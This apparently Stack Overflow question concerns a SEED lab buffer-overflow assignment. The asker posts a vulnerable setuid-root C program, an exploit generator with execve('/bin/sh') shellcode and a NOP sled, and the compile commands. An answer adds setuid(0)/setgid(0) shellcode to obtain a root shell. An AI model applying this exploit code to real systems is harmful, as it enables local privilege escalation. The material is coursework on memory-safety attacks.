# Can't Get Root Shell on Buffer Overflow Assignment

Tags: c, buffer-overflow

I am working an assignment (see http://www.cis.syr.edu/~wedu/seed/Labs_12.04/Software/Buffer_Overflow/) and, when I run `./stack` I end up with `Trace/breakpoint trap` instead of the root shell. The following is my code for `exploit.c` (which creates `badfile`) and `stack.c` (which reads `badfile` in and uses `strcpy` to copy it into a buffer that isn't big enough to handle it.

exploit.c

```
/* exploit.c */

/* A program that creates a file containing code for launching shell*/
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
char shellcode[]=
    "\x31\xc0"          /* xorl         %eax,%eax               */
    "\x50"              /* pushl        %eax                    */
    "\x68""//sh"        /* pushl        $0x68732f2f             */
    "\x68""/bin"        /* pushl        $0x6e69622f             */
    "\x89\xe3"          /* movl         %esp,%ebx               */
    "\x50"              /* pushl        %eax                    */
    "\x53"              /* pushl        %ebx                    */
    "\x89\xe1"          /* movl         %esp,%ecx               */
    "\x99"              /* cdq                                  */
    "\xb0\x0b"          /* movb         $0x0b,%al               */
    "\xcd\x80"          /* int          $0x80                   */
;

void main(int argc, char **argv)
{
    char buffer[517];
    FILE *badfile;

    /* Initialize buffer with 0x90 (NOP instruction) */
    memset(&buffer, 0x90, 517);

    /* You need to fill the buffer with appropriate contents here */
    memset(buffer + 39, 0xbf, 1);
    memset(buffer + 38, 0xff, 1);
    memset(buffer + 37, 0xf1, 1);
    memset(buffer + 36, 0x40, 1);
    strcpy(buffer + 492, shellcode); 

    /* Save the contents to the file "badfile" */
    badfile = fopen("./badfile", "w");
    fwrite(buffer, 517, 1, badfile);
    fclose(badfile);
}
```

stack.c

```
/* stack.c */

/* This program has a buffer overflow vulnerability. */
/* Our task is to exploit this vulnerability */
#include <stdlib.h>
#include <stdio.h>
#include <string.h>

int bof(char *str)
{
    char buffer[24];

    /* The following statement has a buffer overflow problem */
    strcpy(buffer, str);

    return 1;
}

int main(int argc, char **argv)
{
    char str[517];
    FILE *badfile;

    badfile = fopen("badfile", "r");
    fread(str, sizeof(char), 517, badfile);
    bof(str);

    printf("Returned Properly\n");
    return 1;
}
```

I compiled stack.c and set permissions as root with

```
root:/home/seed# gcc -g -o stack -z execstack -fno-stack-protector stack.c
root:/home/seed# chown root stack
root:/home/seed# chmod 4755 stack
```

I compiled exploit.c as myself (seed) with

```
seed:~$ gcc -g -o exploit exploit.c
```

I run `./exploit` to create `badfile`, and get no errors. I run `./stack` and get `Trace/breakpoint trap`.

If I run `gdb stack` I get the shell, but it is not the root shell.

```
gdb-peda$ run
Starting program: /home/seed/stack
process 24232 is executing new program: /bin/dash
$
```

If I run `seed:~$ ./stack -D_FORTIFY_SOURCE=0` I get the shell, but once again it isn't root.

```
seed:~$ ./stack -D_FORTIFY_SOURCE=0
$ id
uid=1000(seed) gid=1000(seed)
$
```

So, what do I need to change to get a root shell?

Comment: you would not be able to have a root shell if your target executable is not running with root priviledge

Comment: At least not without privilege escalation exploit

Comment: @dvhh Looks like OP made it suid root above

Comment: What should the parameter `-D_FORTIFY_SOURCE=0` do when running `stack`? Looks more like a compiler option

Comment: @Ctx, I used `-D_FORTIFY_SOURCE=0` as a compiler option and it didn't change anything (I still got `Trace/breakpoint trap` when running `stack`). I used it when running `stack` just to try something different, and it at least got me to a returned shell and past the `Trace/breakpoint trap` option.

Answer (score 0):

I guess, you can add `setuid()` and `setgid()` syscall in your shellcode.

```
char shellcode[]=
"\x31\xdb\x89\xd8\xb0\x17\xcd\x80"  // setuid(0);
"\x31\xdb\x89\xd8\xb0\x2e\xcd\x80"  // setgid(0);
"\x31\xc0"          /* xorl         %eax,%eax               */
"\x50"              /* pushl        %eax                    */
"\x68""//sh"        /* pushl        $0x68732f2f             */
"\x68""/bin"        /* pushl        $0x6e69622f             */
"\x89\xe3"          /* movl         %esp,%ebx               */
"\x50"              /* pushl        %eax                    */
"\x53"              /* pushl        %ebx                    */
"\x89\xe1"          /* movl         %esp,%ecx               */
"\x99"              /* cdq                                  */
"\xb0\x0b"          /* movb         $0x0b,%al               */
"\xcd\x80"          /* int          $0x80                   */
;
```

Of course, change owner to `root`